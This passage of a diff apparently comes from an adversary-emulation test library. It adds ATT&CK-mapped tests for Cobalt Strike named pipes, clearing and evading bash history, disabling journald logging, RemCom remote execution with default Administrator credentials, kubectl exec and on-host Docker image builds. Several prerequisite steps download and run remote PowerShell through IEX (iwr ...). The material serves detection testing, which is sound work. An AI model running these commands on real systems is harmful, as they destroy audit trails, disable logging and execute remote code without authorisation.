+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
+    name: command_prompt
+    
+- name: Cobalt Strike SSH (postex_ssh) pipe
+  auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
+    name: command_prompt
+
+- name: Cobalt Strike post-exploitation pipe (4.2 and later)
+  auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
+    name: command_prompt
+    
+- name: Cobalt Strike post-exploitation pipe (before 4.2)
+  auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
+    name: command_prompt

atomics/T1562.003/T1562.003.md

@@ -16,6 +16,16 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te
 
 - [Atomic Test #2 - Mac HISTCONTROL](#atomic-test-2---mac-histcontrol)
 
+- [Atomic Test #3 - Clear bash history](#atomic-test-3---clear-bash-history)
+
+- [Atomic Test #4 - Setting the HISTCONTROL environment variable](#atomic-test-4---setting-the-histcontrol-environment-variable)
+
+- [Atomic Test #5 - Setting the HISTFILESIZE environment variable](#atomic-test-5---setting-the-histfilesize-environment-variable)
+
+- [Atomic Test #6 - Setting the HISTFILE environment variable](#atomic-test-6---setting-the-histfile-environment-variable)
+
+- [Atomic Test #7 - Setting the HISTIGNORE environment variable](#atomic-test-7---setting-the-histignore-environment-variable)
+
 
 <br/>
 
@@ -80,4 +90,215 @@ https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcon
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Clear bash history
+An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. 
+
+In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 878794f7-c511-4199-a950-8c28b3ed8e5b
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+cp $HISTFILE $HISTFILE.OLD
+if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
+echo "" > $HISTFILE
+if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
+ls -la $HISTFILE 
+cat $HISTFILE
+history -c 
+if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
+```
+
+#### Cleanup Commands:
+```bash
+mv -f $HISTFILE.OLD $HISTFILE
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Setting the HISTCONTROL environment variable
+An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. 
+
+In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 10ab786a-028e-4465-96f6-9e83ca6c5f24
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+TEST=$(echo $HISTCONTROL)
+if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
+history -c 
+ls -la $HISTFILE # " ls -la $HISTFILE"
+if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
+# -> ls -la is not in history cache
+if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
+history -c 
+ls -la $HISTFILE
+ls -la $HISTFILE
+ls -la $HISTFILE
+if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
+```
+
+#### Cleanup Commands:
+```bash
+export HISTCONTROL=$(echo $TEST)
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Setting the HISTFILESIZE environment variable
+An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+TEST=$(echo $HISTFILESIZE)
+echo $HISTFILESIZE
+export HISTFILESIZE=0
+if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+# -> $HISTFILESIZE is zero
+```
+
+#### Cleanup Commands:
+```bash
+export HISTCONTROL=$(echo $TEST)
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Setting the HISTFILE environment variable
+An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+TEST=$(echo $HISTFILE)
+echo $HISTFILE
+export HISTFILE="/dev/null"
+if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+# -> $HISTFILE is /dev/null
+```
+
+#### Cleanup Commands:
+```bash
+export HISTFILE=$(echo $TEST)
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Setting the HISTIGNORE environment variable
+An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. 
+
+In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** f12acddb-7502-4ce6-a146-5b62c59592f1
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+# -> $HISTIGNORE = ls*:rm*:ssh*
+history -c 
+ls -la $HISTFILE
+ls -la ~/.bash_logout
+if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
+# -> ls commands are not in history
+unset HISTIGNORE
+
+if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+# -> $HISTIGNORE = *
+history -c 
+whoami
+groups
+if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
+# -> History cache is empty
+```
+
+#### Cleanup Commands:
+```bash
+unset HISTIGNORE
+```
+
+
+
+
+
 <br/>

atomics/T1562.003/T1562.003.yaml

@@ -35,3 +35,119 @@ atomic_tests:
       3. ls
       4. whoami > recon.txt
     name: manual
+- name: Clear bash history
+  auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
+  description: |
+    An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. 
+
+    In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      cp $HISTFILE $HISTFILE.OLD
+      if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
+      echo "" > $HISTFILE
+      if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
+      ls -la $HISTFILE 
+      cat $HISTFILE
+      history -c 
+      if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
+    cleanup_command: |
+      mv -f $HISTFILE.OLD $HISTFILE 
+- name: Setting the HISTCONTROL environment variable
+  auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
+  description: |
+    An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. 
+
+    In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      TEST=$(echo $HISTCONTROL)
+      if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
+      history -c 
+      ls -la $HISTFILE # " ls -la $HISTFILE"
+      if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
+      # -> ls -la is not in history cache
+      if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
+      history -c 
+      ls -la $HISTFILE
+      ls -la $HISTFILE
+      ls -la $HISTFILE
+      if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
+    cleanup_command: |
+      export HISTCONTROL=$(echo $TEST)
+- name: Setting the HISTFILESIZE environment variable
+  auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+  description: |
+    An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+    Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      TEST=$(echo $HISTFILESIZE)
+      echo $HISTFILESIZE
+      export HISTFILESIZE=0
+      if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+      # -> $HISTFILESIZE is zero
+    cleanup_command: |
+      export HISTCONTROL=$(echo $TEST)
+- name: Setting the HISTFILE environment variable 
+  auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+  description: |
+    An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+    Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      TEST=$(echo $HISTFILE)
+      echo $HISTFILE
+      export HISTFILE="/dev/null"
+      if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+      # -> $HISTFILE is /dev/null
+    cleanup_command: |
+      export HISTFILE=$(echo $TEST)
+- name: Setting the HISTIGNORE environment variable 
+  auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
+  description: |
+    An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. 
+
+    In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
+  supported_platforms:
+  - linux
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+      # -> $HISTIGNORE = ls*:rm*:ssh*
+      history -c 
+      ls -la $HISTFILE
+      ls -la ~/.bash_logout
+      if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
+      # -> ls commands are not in history
+      unset HISTIGNORE
+
+      if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
+      # -> $HISTIGNORE = *
+      history -c 
+      whoami
+      groups
+      if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
+      # -> History cache is empty
+    cleanup_command: |
+      unset HISTIGNORE

atomics/T1562/T1562.md

@@ -8,6 +8,10 @@ Adversaries could also target event aggregation and analysis mechanisms, or othe
 
 - [Atomic Test #1 - Windows Disable LSA Protection](#atomic-test-1---windows-disable-lsa-protection)
 
+- [Atomic Test #2 - Disable journal logging via systemctl utility](#atomic-test-2---disable-journal-logging-via-systemctl-utility)
+
+- [Atomic Test #3 - Disable journal logging via sed utility](#atomic-test-3---disable-journal-logging-via-sed-utility)
+
 
 <br/>
 
@@ -46,4 +50,70 @@ reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Disable journal logging via systemctl utility
+The atomic test disables the journal logging using built-in systemctl utility
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** c3a377f9-1203-4454-aa35-9d391d34768f
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo systemctl stop systemd-journald #disables journal logging
+```
+
+#### Cleanup Commands:
+```sh
+sudo systemctl start systemd-journald #starts journal service
+sudo systemctl enable systemd-journald #starts journal service automatically at boot time
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Disable journal logging via sed utility
+The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 12e5551c-8d5c-408e-b3e4-63f53b03379f
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
+```
+
+#### Cleanup Commands:
+```sh
+sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
+sudo systemctl restart systemd-journald #restart the journal service
+```
+
+
+
+
+
 <br/>

atomics/T1562/T1562.yaml

@@ -19,4 +19,32 @@ atomic_tests:
     cleanup_command: |
       reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
     name: command_prompt
-    elevation_required: true
+    elevation_required: true
+- name: Disable journal logging via systemctl utility
+  auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
+  description: |
+    The atomic test disables the journal logging using built-in systemctl utility
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo systemctl stop systemd-journald #disables journal logging
+    cleanup_command: |
+      sudo systemctl start systemd-journald #starts journal service
+      sudo systemctl enable systemd-journald #starts journal service automatically at boot time
+    name: sh
+    elevation_required: true
+- name: Disable journal logging via sed utility
+  auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
+  description: |
+    The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
+    cleanup_command: |
+      sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
+      sudo systemctl restart systemd-journald #restart the journal service
+    name: sh
+    elevation_required: true

atomics/T1564/T1564.md

@@ -177,6 +177,7 @@ sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDT
 
 #### Cleanup Commands:
 ```cmd
+sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
 sc.exe delete #{service_name}
 ```
 

atomics/T1564/T1564.yaml

@@ -84,6 +84,7 @@ atomic_tests:
       sc.exe create #{service_name} binPath= "#{executable_command}"
       sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
     cleanup_command: |
+      sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
       sc.exe delete #{service_name}
     name: command_prompt
     elevation_required: true

atomics/T1569.002/T1569.002.md

@@ -16,6 +16,8 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
 
 - [Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement](#atomic-test-4---blackcat-pre-encryption-cmds-with-lateral-movement)
 
+- [Atomic Test #5 - Use RemCom to execute a command on a remote host](#atomic-test-5---use-remcom-to-execute-a-command-on-a-remote-host)
+
 
 <br/>
 
@@ -209,4 +211,54 @@ rm $env:temp\psexec.exe
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Use RemCom to execute a command on a remote host
+Requires having RemCom installed, path to RemCom is one of the input input_arguments
+Will start a process on a remote host.
+Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_host | Remote hostname or IP address | string | localhost|
+| user_name | Username | string | Administrator|
+| password | Password | string | P@ssw0rd1|
+| remcom_exe | Path to RemCom | string | $pathtoatomicsfolder&#92;T1569.002&#92;bin&#92;remcom.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: RemCom tool must exist on disk at specified location (#{remcom_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
+```
+
+
+
+
 <br/>

atomics/T1569.002/T1569.002.yaml

@@ -140,3 +140,41 @@ atomic_tests:
       rm $env:temp\psexec.exe
     name: powershell
     elevation_required: true
+    
+- name: Use RemCom to execute a command on a remote host
+  auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+  description: |
+    Requires having RemCom installed, path to RemCom is one of the input input_arguments
+    Will start a process on a remote host.
+    Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_host:
+      description: Remote hostname or IP address
+      type: string
+      default: localhost
+    user_name:
+      description: Username
+      type: string
+      default: Administrator
+    password:
+      description: Password
+      type: string
+      default: P@ssw0rd1
+    remcom_exe:
+      description: Path to RemCom
+      type: string
+      default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      RemCom tool must exist on disk at specified location (#{remcom_exe})
+    prereq_command: |
+      if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
+  executor:
+    command: |
+      "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
+    name: command_prompt

atomics/T1609/T1609.md

@@ -30,13 +30,16 @@ Attackers who have permissions, can run malicious commands in containers in the
 |------|-------------|------|---------------|
 | namespace | K8s namespace to use | string | default|
 | command | Command to run | string | uname|
+| path | Path to busybox.yaml file | string | $PathtoAtomicsFolder/T1609/src/busybox.yaml|
 
 
 #### Attack Commands: Run with `bash`! 
 
 
 ```bash
-kubectl create -f src/busybox.yaml -n #{namespace}
+kubectl create -f #{path} -n #{namespace}
+# wait 3 seconds for the instance to come up
+sleep 3
 kubectl exec -n #{namespace} busybox -- #{command}
 ```
 
@@ -76,11 +79,6 @@ Attackers who have permissions, can run malicious commands in containers in the
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| command | Command to run | string | cat|
-
 
 #### Attack Commands: Run with `bash`! 
 

atomics/T1609/T1609.yaml

@@ -16,6 +16,10 @@ atomic_tests:
       description: Command to run
       type: string
       default: uname
+    path:
+      description: Path to busybox.yaml file
+      type: string
+      default: $PathtoAtomicsFolder/T1609/src/busybox.yaml  
   dependencies:
   - description: |
       kubectl must be installed
@@ -25,7 +29,9 @@ atomic_tests:
       which kubectl
   executor:
     command: |
-      kubectl create -f src/busybox.yaml -n #{namespace}
+      kubectl create -f #{path} -n #{namespace}
+      # wait 3 seconds for the instance to come up
+      sleep 3
       kubectl exec -n #{namespace} busybox -- #{command}
     cleanup_command: |
       kubectl delete pod busybox -n #{namespace}
@@ -38,11 +44,6 @@ atomic_tests:
 
   supported_platforms:
   - containers
-  input_arguments:
-    command:
-      description: Command to run
-      type: string
-      default: cat
   dependencies:
   - description: |
       docker must be installed

atomics/T1609/src/busybox.yaml

@@ -5,10 +5,10 @@ metadata:
 spec:
   containers:
   - name: busybox
-    image: busybox:stable
-    imagePullPolicy: IfNotPresent
+    image: busybox
+    imagePullPolicy: Always
     command:
     - /bin/sh
     - -c
     - while true; do sleep 30; done;
-  restartPolicy: OnFailure
+  restartPolicy: OnFailure

atomics/T1612/T1612.md

@@ -0,0 +1,67 @@
+# T1612 - Build Image on Host
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1612)
+<blockquote>Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
+
+An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Build Image On Host](#atomic-test-1---build-image-on-host)
+
+
+<br/>
+
+## Atomic Test #1 - Build Image On Host
+Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 2db30061-589d-409b-b125-7b473944f9b3
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+docker build -t t1612  $PathtoAtomicsFolder/T1612/src/
+docker run --name t1612_container  -d -t t1612
+docker exec t1612_container ./test.sh
+```
+
+#### Cleanup Commands:
+```sh
+docker stop t1612_container
+docker rmi -f t1612
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Verify docker is installed.
+##### Check Prereq Commands:
+```sh
+which docker
+```
+##### Get Prereq Commands:
+```sh
+if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+```
+##### Description: Verify docker service is running.
+##### Check Prereq Commands:
+```sh
+sudo systemctl status docker  --no-pager
+```
+##### Get Prereq Commands:
+```sh
+sudo systemctl start docker
+```
+
+
+
+
+<br/>

atomics/T1612/T1612.yaml

@@ -0,0 +1,30 @@
+attack_technique: T1612
+display_name: "Build Image on Host"
+atomic_tests:
+- name: Build Image On Host
+  auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
+  description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
+  supported_platforms:
+  - containers
+  dependency_executor_name: sh
+  dependencies:
+  - description: Verify docker is installed.
+    prereq_command: |
+      which docker
+    get_prereq_command: |
+      if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+
+  - description: Verify docker service is running.
+    prereq_command: |
